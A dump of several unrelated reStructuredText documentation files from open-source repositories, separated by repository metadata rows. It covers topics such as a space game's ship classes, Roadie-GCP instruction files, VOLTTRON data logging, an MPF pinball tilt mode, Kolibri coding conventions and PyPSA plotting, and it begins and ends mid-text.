Battleships are large, lumbering mammoths, often bristling with lots of nasty
weaponry. These ships' sole purpose is to deal out as much pain as possible,
while absorbing as much retaliation as possible.
Battleships are almost never seen alone, and require the support of smaller
ships. Battleships are particularly ill-equipped to defend themselves from
large groups of Fighters and Frigates.
Capital Ships
-------------
Capital Ships are the largest ships to grace the space lanes. These range in
purpose from mass cargo freighters, to factory ships, to Carriers and
Dreadnaughts.
Capital Ships are typically very specialized, extremely expensive, and reliant
upon fleet support. Capitals may often field and maintain a complement of
Fighters.
| 33.402778 | 79 | 0.77921 |
cc0d25e64145d03c727d6d94df41cec9e87f04dd | 3,285 | rst | reStructuredText | docs/source/instruction.rst | jkawamoto/roadie-gcp | 96394a47d375bd01e167f351fc86a03905e98395 | [
"MIT"
] | 1 | 2018-09-20T01:51:23.000Z | 2018-09-20T01:51:23.000Z | docs/source/instruction.rst | jkawamoto/roadie-gcp | 96394a47d375bd01e167f351fc86a03905e98395 | [
"MIT"
] | 9 | 2016-01-31T11:28:12.000Z | 2021-04-30T20:43:39.000Z | docs/source/instruction.rst | jkawamoto/roadie-gcp | 96394a47d375bd01e167f351fc86a03905e98395 | [
"MIT"
] | null | null | null | Instruction file
===================
An instruction file is a YAML document. It has six top-level elements:
``apt``, ``source``, ``data``, ``run``, ``result``, and ``upload``.
apt
-----
The ``apt`` section specifies a package list to be installed via apt.
.. code-block:: yaml
apt:
- nodejs
- package_a
- package_b
source
-------
The ``source`` section specifies how to obtain source code.
It can contain either a git repository URL or a normal URL.
A git repository URL is a URL that ends with ``.git``.
Such URLs will be fetched with ``git clone``.
If you want to use ssh to connect to your repository,
you may need to deploy valid ssh keys in ``/root/.ssh`` in this container.
For a *normal URL*, in addition to the basic schemes ``http`` and ``https``,
the URL supports ``gs``, which means an object in Google Cloud Storage, and ``dropbox``.
See the next section for details.
Example
.........
Clone source code from a git repository:
.. code-block:: yaml
source: https://github.com/itslab-kyushu/youtube-comment-scraper.git
Download source code from some web server:
.. code-block:: yaml
   source: https://example.com/abc.txt
Download source code from Google Cloud Storage:
.. code-block:: yaml
source: gs://your_bucket/path_to_object
Download source code from Dropbox:
.. code-block:: yaml
source: dropbox://www.dropbox.com/sh/abcdefg/ABCDEFGHIJKLMN
data
------
The ``data`` section specifies URLs to be downloaded.
It must be a list of extended URLs, and the format of an extended URL is
``scheme://hostname/path`` or ``scheme://hostname/path:dest``.
The URL schemes Roadie-GCP supports are ``gs``, ``dropbox``, and the schemes that ``curl`` supports.
To download objects, Roadie-GCP uses ``curl``, but it uses ``gsutil`` for the ``gs`` scheme.
``dropbox`` is a pseudo scheme to download objects from `Dropbox <https://www.dropbox.com/>`_.
To use this scheme, get a public URL from Dropbox and then replace ``https`` with ``dropbox``.
When you download objects via Dropbox's public link, they are zipped.
Using the ``dropbox`` scheme will unzip those objects.
Downloaded objects will be put in ``/data``, which is the default working directory.
You can also use the second form of the URL to specify destinations of objects.
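For example, a ``data`` section that downloads one object from Google Cloud Storage and one file over HTTPS, placing the latter at ``input/abc.txt``, could look like this (bucket and file names are illustrative)::

    data:
      - gs://your_bucket/path_to_object
      - https://example.com/abc.txt:input/abc.txt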
run
-----
The ``run`` section specifies which commands will be run.
It must be a list of commands.
Those commands will be executed via the shell.
The STDOUT of each command will be stored in a file named ``stdout*.txt`` and uploaded to Google Cloud Storage.
For example, the output of the first command will be stored in ``stdout0.txt``.
STDERR, on the other hand, is written to the Docker logs.
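For example, a ``run`` section with two commands could look like this (the commands themselves are illustrative)::

    run:
      - python analyze.py /data/abc.txt
      - python summarize.py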
result
--------
The ``result`` section specifies where outputs should be stored.
Outputs include the STDOUT of each command.
Currently, Roadie-GCP supports only locations in Google Cloud Storage.
Thus, the value of the ``result`` element must be a URL whose scheme is ``gs``.
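For example (the bucket name is illustrative)::

    result: gs://your_bucket/results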
upload
--------
The ``upload`` section specifies other files to be uploaded as results.
This section consists of a list of glob patterns.
Objects matching one of the patterns will be uploaded to the cloud storage.
Each glob pattern can have a destination after ``:``.
For example, ``*.out:result`` means objects matching ``*.out`` will be uploaded to the ``result`` folder.
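Putting those rules together, a complete ``upload`` section could look like this (the patterns are illustrative)::

    upload:
      - "*.out:result"
      - "*.log"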
| 32.524752 | 108 | 0.722679 |
bf689d416d2e4d428d21ca06bb77c1b45f8a655a | 148 | rst | reStructuredText | docs/eye.helpers.margins.rst | hydrargyrum/eye | b4a6994fee74b7a70d4f918bc3a29184fe8d5526 | [
"WTFPL"
] | 12 | 2015-09-07T18:32:15.000Z | 2021-02-21T17:29:15.000Z | docs/eye.helpers.margins.rst | hydrargyrum/eye | b4a6994fee74b7a70d4f918bc3a29184fe8d5526 | [
"WTFPL"
] | 20 | 2016-08-01T19:24:43.000Z | 2020-12-23T21:29:04.000Z | docs/eye.helpers.margins.rst | hydrargyrum/eye | b4a6994fee74b7a70d4f918bc3a29184fe8d5526 | [
"WTFPL"
] | 1 | 2018-09-07T14:26:24.000Z | 2018-09-07T14:26:24.000Z | eye.helpers.margins module
==========================
.. automodule:: eye.helpers.margins
:members:
:undoc-members:
:show-inheritance:
| 18.5 | 35 | 0.567568 |
10781019a3faeaf7f850ca2a7e5caf3d118f6a0d | 259 | rst | reStructuredText | doc/reference/rtos_drivers/spi/spi.rst | danielpieczko/xcore_sdk | abb3bdc62d72fa8c13e77f778312ba9f8b29c0f4 | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null | doc/reference/rtos_drivers/spi/spi.rst | danielpieczko/xcore_sdk | abb3bdc62d72fa8c13e77f778312ba9f8b29c0f4 | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null | doc/reference/rtos_drivers/spi/spi.rst | danielpieczko/xcore_sdk | abb3bdc62d72fa8c13e77f778312ba9f8b29c0f4 | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null | ###############
SPI RTOS Driver
###############
This driver can be used to instantiate and control a SPI master or slave mode I/O interface on XCore in an RTOS application.
.. toctree::
:maxdepth: 2
:includehidden:
spi_master.rst
spi_slave.rst
| 19.923077 | 124 | 0.644788 |
8b71d0c59ef657abbc5cb1f8bd48dc35bc1d85dd | 169 | rst | reStructuredText | projects/rumigen/project-description.rst | FAANG/comm-data-portal-projects | bc184cf442265cfe0da65aa6f456e42e8386cfc3 | [
"Apache-2.0"
] | null | null | null | projects/rumigen/project-description.rst | FAANG/comm-data-portal-projects | bc184cf442265cfe0da65aa6f456e42e8386cfc3 | [
"Apache-2.0"
] | null | null | null | projects/rumigen/project-description.rst | FAANG/comm-data-portal-projects | bc184cf442265cfe0da65aa6f456e42e8386cfc3 | [
"Apache-2.0"
] | null | null | null | RUMIGEN is a multi-actor project aiming to improve genetic tools in bovine breeds through the addition of new traits such as heat tolerance, and epigenetic information.
| 84.5 | 168 | 0.828402 |
e3c1b2a96f559b0bfe18f26315bf59ed4e9ac0e4 | 2,022 | rst | reStructuredText | docs/source/unused/deprecated/Logging.rst | rmay-intwine/volttron | a449f70e32f73ff0136a838d0feddb928ede6298 | [
"Apache-2.0"
] | 1 | 2021-04-20T12:03:36.000Z | 2021-04-20T12:03:36.000Z | docs/source/unused/deprecated/Logging.rst | rmay-intwine/volttron | a449f70e32f73ff0136a838d0feddb928ede6298 | [
"Apache-2.0"
] | null | null | null | docs/source/unused/deprecated/Logging.rst | rmay-intwine/volttron | a449f70e32f73ff0136a838d0feddb928ede6298 | [
"Apache-2.0"
] | 1 | 2018-08-14T23:28:10.000Z | 2018-08-14T23:28:10.000Z | Data Logging
------------
A mechanism allowing agents to store timeseries data has been provided.
In VOLTTRON 2.0 this facility was provided by an sMAP agent but it has
now been folded into the new Historians. This service still uses the old
format to maintain compatibility.
Data Logging Format
~~~~~~~~~~~~~~~~~~~
Data sent to the data logger should be sent as a JSON object that
consists of a dictionary of dictionaries. The keys of the outer
dictionary are used as the points to store the data items. The inner
dictionary consists of 2 required fields and 1 optional. The required
fields are "Readings" and "Units". Readings contains the data that will
be written. It may contain either a single value, or a list of lists
which consists of timestamp/value pairs. Units is a string that
identifies the meaning of the scale values of the data. The optional
entry is data\_type, which indicates the type of the data to be stored.
This may be either long or double.
::
{
"test3": {
"Readings": [[1377788595, 1.1],[1377788605,2.0]],
"Units": "KwH",
"data_type": "double"
},
"test4": {
"Readings": [[1377788595, 1.1],[1377788605,2.0]],
"Units": "TU",
"data_type": "double"
}
}
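A payload in the format above can also be built programmatically before publishing. This is a minimal illustrative sketch in plain Python using only the standard library; the helper name ``make_log_message`` is ours, not part of the VOLTTRON API:

```python
import json
import time


def make_log_message(points):
    """Build a data-logger payload from {point: (readings, units, data_type)}."""
    message = {}
    for name, (readings, units, data_type) in points.items():
        message[name] = {
            "Readings": readings,
            "Units": units,
            "data_type": data_type,
        }
    return json.dumps(message)


now = int(time.time())
payload = make_log_message({
    "test3": ([[now, 1.1]], "KwH", "double"),
    "test4": ([[now, 2.0]], "TU", "double"),
})
print(payload)
```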
Example Code
~~~~~~~~~~~~
::
    import json
    import time

    from volttron.platform.messaging import headers as headers_mod

    # This snippet runs inside an agent method: self._agent_id and
    # self.publish() are provided by the agent base class.
    headers = {}
    headers[headers_mod.FROM] = self._agent_id
    headers[headers_mod.CONTENT_TYPE] = headers_mod.CONTENT_TYPE.JSON
    mytime = int(time.time())
    content = {
        "listener": {
            "Readings": [[mytime, 1.0]],
            "Units": "TU",
            "data_type": "double"
        },
        "heartbeat": {
            "Readings": [[mytime, 1.0]],
            "Units": "TU",
            "data_type": "double"
        }
    }
    self.publish('datalogger/log/', headers, json.dumps(content))
| 31.107692 | 77 | 0.560831 |
378f8b2b50b22b19c3e075ff7f207ea1c5bd7064 | 4,578 | rst | reStructuredText | api/autoapi/Microsoft/Extensions/Caching/Memory/CacheExtensions/index.rst | lucasvfventura/Docs | ea93e685c737236ab08d5444065cc550bba17afa | [
"Apache-2.0"
] | 2 | 2017-12-12T05:08:17.000Z | 2021-02-08T10:15:42.000Z | api/autoapi/Microsoft/Extensions/Caching/Memory/CacheExtensions/index.rst | lucasvfventura/Docs | ea93e685c737236ab08d5444065cc550bba17afa | [
"Apache-2.0"
] | null | null | null | api/autoapi/Microsoft/Extensions/Caching/Memory/CacheExtensions/index.rst | lucasvfventura/Docs | ea93e685c737236ab08d5444065cc550bba17afa | [
"Apache-2.0"
] | 3 | 2017-12-12T05:08:29.000Z | 2022-02-02T08:39:25.000Z |
CacheExtensions Class
=====================
.. contents::
:local:
Inheritance Hierarchy
---------------------
* :dn:cls:`System.Object`
* :dn:cls:`Microsoft.Extensions.Caching.Memory.CacheExtensions`
Syntax
------
.. code-block:: csharp
public class CacheExtensions
GitHub
------
`View on GitHub <https://github.com/aspnet/caching/blob/master/src/Microsoft.Extensions.Caching.Abstractions/MemoryCacheExtensions.cs>`_
.. dn:class:: Microsoft.Extensions.Caching.Memory.CacheExtensions
Methods
-------
.. dn:class:: Microsoft.Extensions.Caching.Memory.CacheExtensions
:noindex:
:hidden:
.. dn:method:: Microsoft.Extensions.Caching.Memory.CacheExtensions.Get(Microsoft.Extensions.Caching.Memory.IMemoryCache, System.Object)
:type cache: Microsoft.Extensions.Caching.Memory.IMemoryCache
:type key: System.Object
:rtype: System.Object
.. code-block:: csharp
public static object Get(IMemoryCache cache, object key)
.. dn:method:: Microsoft.Extensions.Caching.Memory.CacheExtensions.Get<TItem>(Microsoft.Extensions.Caching.Memory.IMemoryCache, System.Object)
:type cache: Microsoft.Extensions.Caching.Memory.IMemoryCache
:type key: System.Object
:rtype: {TItem}
.. code-block:: csharp
public static TItem Get<TItem>(IMemoryCache cache, object key)
.. dn:method:: Microsoft.Extensions.Caching.Memory.CacheExtensions.Set(Microsoft.Extensions.Caching.Memory.IMemoryCache, System.Object, System.Object)
:type cache: Microsoft.Extensions.Caching.Memory.IMemoryCache
:type key: System.Object
:type value: System.Object
:rtype: System.Object
.. code-block:: csharp
public static object Set(IMemoryCache cache, object key, object value)
.. dn:method:: Microsoft.Extensions.Caching.Memory.CacheExtensions.Set(Microsoft.Extensions.Caching.Memory.IMemoryCache, System.Object, System.Object, Microsoft.Extensions.Caching.Memory.MemoryCacheEntryOptions)
:type cache: Microsoft.Extensions.Caching.Memory.IMemoryCache
:type key: System.Object
:type value: System.Object
:type options: Microsoft.Extensions.Caching.Memory.MemoryCacheEntryOptions
:rtype: System.Object
.. code-block:: csharp
public static object Set(IMemoryCache cache, object key, object value, MemoryCacheEntryOptions options)
.. dn:method:: Microsoft.Extensions.Caching.Memory.CacheExtensions.Set<TItem>(Microsoft.Extensions.Caching.Memory.IMemoryCache, System.Object, TItem)
:type cache: Microsoft.Extensions.Caching.Memory.IMemoryCache
:type key: System.Object
:type value: {TItem}
:rtype: {TItem}
.. code-block:: csharp
public static TItem Set<TItem>(IMemoryCache cache, object key, TItem value)
.. dn:method:: Microsoft.Extensions.Caching.Memory.CacheExtensions.Set<TItem>(Microsoft.Extensions.Caching.Memory.IMemoryCache, System.Object, TItem, Microsoft.Extensions.Caching.Memory.MemoryCacheEntryOptions)
:type cache: Microsoft.Extensions.Caching.Memory.IMemoryCache
:type key: System.Object
:type value: {TItem}
:type options: Microsoft.Extensions.Caching.Memory.MemoryCacheEntryOptions
:rtype: {TItem}
.. code-block:: csharp
public static TItem Set<TItem>(IMemoryCache cache, object key, TItem value, MemoryCacheEntryOptions options)
.. dn:method:: Microsoft.Extensions.Caching.Memory.CacheExtensions.TryGetValue<TItem>(Microsoft.Extensions.Caching.Memory.IMemoryCache, System.Object, out TItem)
:type cache: Microsoft.Extensions.Caching.Memory.IMemoryCache
:type key: System.Object
:type value: {TItem}
:rtype: System.Boolean
.. code-block:: csharp
public static bool TryGetValue<TItem>(IMemoryCache cache, object key, out TItem value)
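
The extension methods above can be combined in ordinary caching code. Here is a minimal illustrative sketch (the ``MemoryCache``/``MemoryCacheOptions`` construction comes from the Microsoft.Extensions.Caching.Memory package; the key and value used are arbitrary):

.. code-block:: csharp

    using System;
    using Microsoft.Extensions.Caching.Memory;

    IMemoryCache cache = new MemoryCache(new MemoryCacheOptions());

    // Store a value with a sliding expiration.
    cache.Set("greeting", "hello", new MemoryCacheEntryOptions
    {
        SlidingExpiration = TimeSpan.FromMinutes(5)
    });

    // TryGetValue reports whether the key was present in the cache.
    if (cache.TryGetValue("greeting", out string value))
    {
        Console.WriteLine(value);
    }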
| 23.476923 | 215 | 0.608563 |
ae47770012c255e91864956fe0a8b18960debc82 | 10,176 | rst | reStructuredText | _not_updated_yet/howtocreateatilt-3696.rst | AdrianD72/mpf-docs | bb20f9af918cfb194491da01d5502b666278f847 | [
"MIT"
] | 15 | 2016-03-26T05:26:29.000Z | 2021-08-28T18:43:04.000Z | _not_updated_yet/howtocreateatilt-3696.rst | AdrianD72/mpf-docs | bb20f9af918cfb194491da01d5502b666278f847 | [
"MIT"
] | 274 | 2016-04-11T16:14:36.000Z | 2022-03-29T20:43:14.000Z | _not_updated_yet/howtocreateatilt-3696.rst | AdrianD72/mpf-docs | bb20f9af918cfb194491da01d5502b666278f847 | [
"MIT"
] | 99 | 2016-04-12T23:25:24.000Z | 2022-02-23T22:08:37.000Z |
This How To guide explains how to configure a tilt in MPF. The MPF
package contains the code for a tilt mode which runs at all times to
watch for tilts, so all you have to do to use it is add some configs to your
machine's *modes* folder and you're all set. Features of the tilt mode
include:
+ Separate processing of tilt warning, tilt, and slam tilt events.
+ Specify that several tilt warnings coming close together only count
  as one warning.
+ Specify "settle time" that the tilt warning switch has to not
  activate in order to let it "settle" between players (so the next
  player after a super hard tilt doesn't get a tilt also because the
  plumb bob was still swinging).
+ Configurable options for when a player's tilt warnings are reset
  (per game, per ball, etc.).
+ Flexible events you can use to trigger display, sound, and lighting
  effects when tilt warnings occur.
Let's dig in to the process of actually getting the tilt set up.
(A) Create your 'tilt' mode folder
----------------------------------
The tilt mode works like any other mode in MPF. You'll create a folder
called *tilt* in your machine's *modes* folder, and that folder will
contain subfolders for config files, images, etc. So to begin, create a
folder called *<your_machine>/modes/tilt*. Then inside there, create
another folder called *config*. Then inside there, create a file
called *tilt.yaml*. (So that file should be at
*<your_machine>/modes/tilt/config/tilt.yaml*.) Your folder structure
should look something like this::

    <your_machine>/
        modes/
            tilt/
                config/
                    tilt.yaml
(B) Configure options for the tilt mode
---------------------------------------
Open up the tilt mode's config file that you just created in your
machine folder. It should be at
*<your_machine>/modes/tilt/config/tilt.yaml*. Since this file is
totally blank, add the required `#config_version=3`_ to the top
line. Next, add a section called *tilt:*. Your *tilt.yaml* file
should now look like this:
::
#config_version=3
tilt:
Next you need to add the settings for the tilt behavior in your
machine. Here's a sample you can use as a starting point:
::
tilt:
tilt_warning_switch_tag: tilt_warning
tilt_switch_tag: tilt
slam_tilt_switch_tag: slam_tilt
warnings_to_tilt: 3
reset_warnings_events: ball_ended
multiple_hit_window: 300ms
settle_time: 5s
tilt_warnings_player_var: tilt_warnings
Full details of what each of these settings does are outlined in the
tilt `section`_ of the configuration file reference, so check that
out for details on anything not covered here. It's all fairly self-
explanatory. First, notice that the switches that activate the *tilt*,
*tilt warning*, and *slam tilt* are controlled by switch tags rather
than by switch names themselves. (We'll add those in the next step.)
*Warnings_to_tilt* is how many warning switch activations lead to a
tilt. The default value of 3 means that the player will have 2
warnings, since on the third activation the tilt will occur. The
*multiple_hit_window* means that multiple tilt warning events within
this time window will only count as a single warning. This is a non-
sliding window, meaning that if the window is 300ms and a tilt warning
comes in at 0 (the first one), then 250ms after that, then 60ms after
that—that will actually count as 2 warnings. (The second hit at 250ms
is within the 300ms window, but the third hit 60ms later is actually
310ms after the first one which started the window, so it counts.) The
*settle_time* is the amount of time that must pass after the last
warning before the tilt will be cleared and the next ball can start.
This is to prevent the situation where a player tilts in an aggressive
way and the plumb bob is bouncing around so much that it causes the
next player's ball to tilt too. So when a tilt occurs, if a ball
drains before the *settle_time* is up, MPF will hold the machine in
the tilt state until it settles, then proceed on to the next player
and/or the next ball. The *reset_warnings_events* is the event in MPF
that resets the tilt warnings to 0. The sample config from above means
that the tilt warnings are reset when the ball ends. In other words
with a *warnings_to_tilt* of 3, the player gets three warnings per
ball. If you want to make the warnings carry over from ball-to-ball,
you could change the *reset_warnings_events* to *game_ended*.
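For example, a sketch of that variant, showing only the changed setting::

    tilt:
        reset_warnings_events: game_ended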
(C) Add switch tags
-------------------
Since the tilt mode uses switch tags instead of switch names, you need
to go into your machine-wide configuration and add the tags to the
various switches you want to do tilt-related things. In most modern
games, you'll just use the tilt_warning and slam_tilt tags, like this
(from your machine-wide config):
::
switches:
s_plumb_bob:
number: s14
label:
            tags: tilt_warning
s_slam_tilt:
number: s21
label:
tags: slam_tilt
(D) Add the tilt mode to your list of modes
-------------------------------------------
Now that you have the tilt settings configured, you can add the tilt
mode to the list of modes that are used in your machine. To do this,
add `- tilt` to the *modes:* section in your machine-wide config, like
this:
::
modes:
- base
- some_existing_mode
- another_mode_you_might_have
- credits
- bonus
- tilt
The order doesn’t matter here since the priority each mode runs at is
configured in its own mode configuration file. All you’re doing now is
configuring the tilt mode as a mode that your machine will use. You
might be wondering why your new *tilt.yaml* mode configuration file
doesn't have a *mode:* section? That's because the *tilt* mode is
built into MPF (in the *mpf/modes/tilt* folder), so when you add a
*tilt* folder to your own machine's modes folder, MPF merges together
the settings from the MPF modes folder and your modes folder. (It
loads the MPF mode config first with baseline settings, and then it
merges in your machine's mode config which can override them.) If you
look at the built-in *tilt* mode's config (at
*mpf/modes/tilt/config/tilt.yaml*), you'll see it has the following
*mode:* section:
::
mode:
code: tilt.Tilt
priority: 10000
start_events: machine_reset_phase_3
stop_on_ball_end: False
The first thing to notice is that the priority of this mode is really high, 10000 by
default. That's because we want this mode to run "on top" of any other
mode so any slides it puts on the display (like the tilt warnings) are
displayed on top of the slides from any other mode that might be
running. Also note that the tilt mode starts when the
*machine_reset_phase_3* event is posted (which is done as part of the
MPF startup process), and that there are no stop events. Basically we
want the tilt mode to start and never stop. (We even want it to run
during attract mode so it can look for slam tilts.)
(E) Add slides and lighting effects
-----------------------------------
There are several events posted by the tilt mode, including:
+ *tilt_warning* – a switch with the tilt warning tag was activated
  outside of the multiple hit window, and the player's tilt warning count has
  just increased.
+ *tilt_warning_<x>* – Same as tilt warning, but the "x" is the
  number of the warning. This lets you put different slides on the
  display for tilt_warning_1 versus tilt_warning_2, etc.
+ *tilt* – The machine has tilted.
+ *tilt_clear* – The tilt is cleared, meaning all the balls have
  drained and the settle_time has passed.
+ *slam_tilt* – The machine has slam tilted.
You can use these events to tell the player what's going on. For
example, the configuration from the tilt mode template includes the
following:
::
slide_player:
tilt_warning_1:
type: text
text: WARNING
expire: 1s
tilt_warning_2:
- type: text
text: WARNING
y: 2
- type: text
text: WARNING
y: 18
expire: 1s
tilt:
type: text
text: TILT
tilt_clear:
clear_slides: yes
These slide player settings put a slide that says *WARNING* on the
display for 1 second on the first warning, and a slide that says
*WARNING WARNING* for the second warning. They also display a slide
that says *TILT* when the player tilts. Also note the *tilt_clear:*
entry which clears out all the slides from the tilt mode when the tilt
clears. Since the tilt mode is running at priority 10,000, these
slides should play on top of any other slides from other active modes.
You can change the fonts, placement, text, etc. of these slides or add
other display elements as you see fit. You could also add
*sound_player* or *light_player* sections if you wanted to play
sounds or blink all the playfield lights. (To blink the playfield
lights, create a light show with 1 step that turns off all the lights
for a half-second or so.)
(F) Check out this complete tilt config file
--------------------------------------------
Here's the complete tilt config file from the Demo Man sample game. (
*demo_man/modes/tilt/config/tilt.yaml*):
::
#config_version=3
tilt:
tilt_warning_switch_tag: tilt_warning
tilt_switch_tag: tilt
slam_tilt_switch_tag: slam_tilt
warnings_to_tilt: 3
reset_warnings_events: ball_ended
multiple_hit_window: 300ms
settle_time: 5s
tilt_warnings_player_var: tilt_warnings
slide_player:
tilt_warning_1:
type: text
text: WARNING
expire: 1s
tilt_warning_2:
- type: text
text: WARNING
y: 2
- type: text
text: WARNING
y: 18
expire: 1s
tilt:
type: text
text: TILT
tilt_clear:
clear_slides: yes
.. _#config_version=3: https://missionpinball.com/docs/configuration-file-reference/important-config-file-concepts/config_version/
.. _ section: https://missionpinball.com/docs/configuration-file-reference/tilt/
| 33.584158 | 130 | 0.712952 |
5912573190cd814e7aa3c7244240a153a33c756f | 589 | rst | reStructuredText | doc/Changelog/9.1/Feature-61170-AddAdditionalHookForRecordList.rst | DanielSiepmann/typo3scan | 630efc8ea9c7bd86c4b9192c91b795fff5d3b8dc | [
"MIT"
] | 1 | 2019-10-04T23:58:04.000Z | 2019-10-04T23:58:04.000Z | doc/Changelog/9.1/Feature-61170-AddAdditionalHookForRecordList.rst | DanielSiepmann/typo3scan | 630efc8ea9c7bd86c4b9192c91b795fff5d3b8dc | [
"MIT"
] | 1 | 2021-12-17T10:58:59.000Z | 2021-12-17T10:58:59.000Z | doc/Changelog/9.1/Feature-61170-AddAdditionalHookForRecordList.rst | DanielSiepmann/typo3scan | 630efc8ea9c7bd86c4b9192c91b795fff5d3b8dc | [
"MIT"
] | 4 | 2020-10-06T08:18:55.000Z | 2022-03-17T11:14:09.000Z | .. include:: ../../Includes.txt
=====================================================
Feature: #61170 - Add additional hook for record list
=====================================================
See :issue:`61170`
Description
===========
An additional hook has been added to `EXT:recordlist` to render content above any other content.
Example of usage
.. code-block:: php
$GLOBALS['TYPO3_CONF_VARS']['SC_OPTIONS']['recordlist/Modules/Recordlist/index.php']['drawHeaderHook']['extkey'] = \Vendor\Extkey\Hooks\PageHook::class . '->render';
.. index:: Backend, LocalConfiguration
| 26.772727 | 169 | 0.578947 |
babec81359460b7ac253e93f55d41576242b09cf | 68 | rst | reStructuredText | workloads/pytorch/recommendation/docs/source/recoder.rst | akshayka/gavel | 40a22a725f2e70478483e98c9b07c6fc588e0c40 | [
"MIT"
] | 67 | 2020-09-07T11:50:03.000Z | 2022-03-31T04:09:08.000Z | docs/source/recoder.rst | delldu/recoder | 6ab51fc5710119854cc0e9f7f3c5fcdbf80204b2 | [
"MIT"
] | 7 | 2020-09-27T01:41:59.000Z | 2022-03-25T05:16:43.000Z | docs/source/recoder.rst | delldu/recoder | 6ab51fc5710119854cc0e9f7f3c5fcdbf80204b2 | [
"MIT"
] | 12 | 2020-10-13T14:31:01.000Z | 2022-02-14T05:44:38.000Z | Recoder
*******
.. autoclass:: recoder.model.Recoder
:members:
| 11.333333 | 36 | 0.617647 |
3c837e79a869c5999633437393c473bd27a3f6ad | 177 | rst | reStructuredText | docs/transports/mtn_nigeria.rst | seidu626/vumi | 62eae205a07029bc7ab382086715694548001876 | [
"BSD-3-Clause"
] | 199 | 2015-01-05T09:04:24.000Z | 2018-08-15T17:02:49.000Z | docs/transports/mtn_nigeria.rst | seidu626/vumi | 62eae205a07029bc7ab382086715694548001876 | [
"BSD-3-Clause"
] | 187 | 2015-01-06T15:22:38.000Z | 2018-07-14T13:15:29.000Z | docs/transports/mtn_nigeria.rst | seidu626/vumi | 62eae205a07029bc7ab382086715694548001876 | [
"BSD-3-Clause"
] | 86 | 2015-01-31T02:47:08.000Z | 2018-12-01T11:59:47.000Z | MTN Nigeria
===========
MTN Nigeria USSD Transport
^^^^^^^^^^^^^^^^^^^^^^^^^^
.. automodule:: vumi.transports.mtn_nigeria.mtn_nigeria_ussd
:members:
:show-inheritance:
| 16.090909 | 60 | 0.59887 |
bbd4060d34698621095d8bcf60d62053946669a6 | 141 | rst | reStructuredText | docs/changes/modeling/12558.feature.rst | emirkmo/astropy | d96cd45b25ae55117d1bcc9c40e83a82037fc815 | [
"BSD-3-Clause"
] | 1 | 2019-03-11T12:26:49.000Z | 2019-03-11T12:26:49.000Z | docs/changes/modeling/12558.feature.rst | emirkmo/astropy | d96cd45b25ae55117d1bcc9c40e83a82037fc815 | [
"BSD-3-Clause"
] | 1 | 2019-10-09T18:54:27.000Z | 2019-10-09T18:54:27.000Z | docs/changes/modeling/12558.feature.rst | emirkmo/astropy | d96cd45b25ae55117d1bcc9c40e83a82037fc815 | [
"BSD-3-Clause"
] | null | null | null | Switch ``modeling.projections`` to use ``astropy.wcs.Prjprm`` wrapper internally and provide access to the ``astropy.wcs.Prjprm`` structure.
| 70.5 | 140 | 0.77305 |
4242fbff183b47a9c95a77dfe7390cc017123611 | 3,058 | rst | reStructuredText | docs/dev/conventions.rst | dylanmccall/kolibri | 34a0fac0920106524092937b8a44ef07701e9fd6 | [
"MIT"
] | 1 | 2021-11-09T11:30:12.000Z | 2021-11-09T11:30:12.000Z | docs/dev/conventions.rst | dylanmccall/kolibri | 34a0fac0920106524092937b8a44ef07701e9fd6 | [
"MIT"
] | 1 | 2016-09-13T19:02:03.000Z | 2016-09-21T17:21:07.000Z | docs/dev/conventions.rst | dylanmccall/kolibri | 34a0fac0920106524092937b8a44ef07701e9fd6 | [
"MIT"
] | 1 | 2020-05-21T18:17:55.000Z | 2020-05-21T18:17:55.000Z | Project Conventions
===================
*TODO*
Documentation
-------------
*reStructuredText, docstrings, requirements for PRs to master...*
Git Workflow
------------
*stable master, develop, feature branches, tags, releases, hot fixes, internal vs external repos...*
Python Code
-----------
*PEP8, additional conventions and best practices...*
Vue.js Components
-----------------
Note that the top-level tags of `Vue.js components <https://vuejs.org/guide/components.html>`_ are ``<template>``, ``<script>``, and ``<style>``.
- Whitespace
- an indent is 2 spaces
- two blank lines between top-level tags
- one blank line of padding within a top-level tag
- one level of indent for the contents of all top-level tags
- Keep most child-components stateless. In practice, this means using ``props`` but not ``data``.
- Avoid using Vue.js' camelCase-to-kebab-case mapping. Instead, use square brackets and strings to reference names.
- Use ``scoped`` styles wherever possible
- Name custom tags using kebab-case
- Components are placed in the *vue* directory. The root component file is called *vue/index.vue*, and is mounted on a tag called ``<rootvue>``.
- Components are defined either as a file with a ``.vue`` extension (*my-component.vue*) or as a directory with an *index.vue* file (*my-component/index.vue*). Both forms can be used with ``require('my-component')``.
- Put child components inside the directory of a parent component if they are *only* used by the parent. Otherwise, put shared child components in the *vue* directory.
- Any user-visible interface text should be made translatable; this can be done by supplementing the Vue.js component definition with the following properties:
- ``$trs``, an object of the form::
    {
      msgId: 'Message text',
    }
- ``$trNameSpace``, a string that namespaces the messages.
- User visible strings should then either be rendered directly in the template with ``{{ $tr('msgId') }}`` or can be made available through computed properties (note, if you want to pass rendered strings into tag/component properties, this will be necessary as Vue.js does not evaluate Javascript expressions in these cases).
JavaScript Code
---------------
- We use the `AirBnB Javascript Style guide <https://github.com/airbnb/javascript>`_ for client-side ES6 code in Vue components.
- ``use strict`` is automatically inserted.
- Use CommonJS-style ``require`` and ``module.exports`` statements, not ES6 ``import``/``export`` statements.
- For logging statements we use a thin wrapper around the ``log-level`` JS library, that prefixes the log statements with information about the logging level and current file. To access the logger, simply include the following code snippet:
.. code-block:: javascript
const logging = require('logging').getLogger(__filename);
Stylus and CSS
--------------
- clear out unused styles
- avoid using classes as JS identifiers, and prefix with ``js-`` if necessary
HTML
----
*attribute lists, semantic structure, accessibility...*
| 35.55814 | 325 | 0.7155 |
a090bb11a0d522815a57de7a39d48433ea683b21 | 1,144 | rst | reStructuredText | doc/plotting.rst | p-glaum/PyPSA | a8cfdf1acd9b348828474ad0899afe2c77818159 | [
"MIT"
] | null | null | null | doc/plotting.rst | p-glaum/PyPSA | a8cfdf1acd9b348828474ad0899afe2c77818159 | [
"MIT"
] | null | null | null | doc/plotting.rst | p-glaum/PyPSA | a8cfdf1acd9b348828474ad0899afe2c77818159 | [
"MIT"
] | null | null | null | ######################
Plotting Networks
######################
See the module ``pypsa.plot``.
PyPSA has several functions available for plotting networks with
different colors/widths/labels on buses and branches.
Static plotting with matplotlib
===============================
Static network plots can be created using the
`matplotlib <https://matplotlib.org/>`_ library. This is meant for use
with `Jupyter notebooks <https://jupyter.org/>`_, but can also be used
to generate image files.
To plot a network with matplotlib run
